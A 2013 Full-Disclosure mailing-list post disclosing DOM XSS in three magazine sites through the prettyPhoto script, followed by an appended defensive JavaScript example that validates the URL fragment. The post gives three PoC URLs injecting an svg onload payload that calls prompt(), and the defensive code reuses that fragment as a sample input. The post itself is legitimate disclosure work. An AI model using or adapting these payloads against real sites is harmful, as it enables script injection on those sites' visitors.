Message-ID: <CAFLnUQOF=jCyYwjREP7pDJ5vz5uLEXZZqjg204cEa=BbESS4gQ@mail.gmail.com>
Date: Sun, 29 Sep 2013 21:40:13 +0800
From: Jay Turla <shipcodez@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Pentest Mag, Data Recovery Magazine, and Software Developer's Journal Vulnerable to DOM XSS

I have been annoyed lately by the staff of Pentest Magazine because of
their spam promotions and "Would you write for Us" inquiries despite saying
no to their proposals. I don't like to write for them because they don't
offer their services for free (also, they sell their magazines to other
people yet they don't pay their writers - no just compensation). So here
is my full disclosure of Pentest Magazine, Data Recovery Magazine, and
Software Developer's Journal, which are all from the same company or somehow
related. The official websites of the magazines mentioned are all
vulnerable to DOM XSS because of the prettyPhoto js.

PoC:
http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
Attached are my screenshots.
P.S. No harm was done!
Download attachment "datarecovery.png" of type "image/png" (163745 bytes)
Download attachment "pentestmag.png" of type "image/png" (303809 bytes)
Download attachment "sdjournal.png" of type "image/png" (223467 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
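
Added example (not part of the original post and not prettyPhoto's code): one way a page script can treat the `#!prettyPhoto/...` fragment seen in the PoC URLs as untrusted input, accepting only an identifier and a numeric index before anything reaches a selector or the DOM. The `<gallery>/<index>` layout, the function names and the `data-gallery` attribute are assumptions made for illustration.

```javascript
// Hypothetical deep-link handler for fragments of the form
//   #!prettyPhoto/<gallery>/<index>/
// Assumption: <gallery> is a short identifier and <index> a small integer.
const PREFIX = '#!prettyPhoto/';
const GALLERY_RE = /^[A-Za-z0-9_-]{1,64}$/;
const INDEX_RE = /^[0-9]{1,4}$/;

// Parse a location.hash string. Returns {gallery, index}, or null when the
// fragment holds anything other than the expected identifier/index pair.
function parseDeepLink(hash) {
  if (typeof hash !== 'string' || !hash.startsWith(PREFIX)) return null;
  let rest;
  try {
    rest = decodeURIComponent(hash.slice(PREFIX.length));
  } catch (e) {
    return null; // malformed percent-encoding
  }
  const parts = rest.replace(/\/$/, '').split('/');
  if (parts.length > 2) return null;
  const [gallery, index = '0'] = parts;
  if (!GALLERY_RE.test(gallery) || !INDEX_RE.test(index)) return null;
  return { gallery, index: Number(index) };
}

// Build a selector only from validated parts, so fragment-controlled
// markup can never be handed to a jQuery-style $() call.
// The data-gallery attribute is hypothetical.
function selectorFor(link) {
  return `a[data-gallery="${link.gallery}"]`;
}

// Constructed sample fragments; the second is the fragment from the PoC
// URLs in the post, the third has broken percent-encoding.
const SAMPLES = [
  '#!prettyPhoto/gallery1/2/',
  '#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/',
  '#!prettyPhoto/%E0%A4%A/',
];

for (const hash of SAMPLES) {
  const link = parseDeepLink(hash);
  console.log(link ? `open ${selectorFor(link)} item ${link.index}` : 'ignored');
}
```

In a browser the handler would be called with `window.location.hash` on load and on `hashchange`, and a `null` result means the fragment is simply ignored.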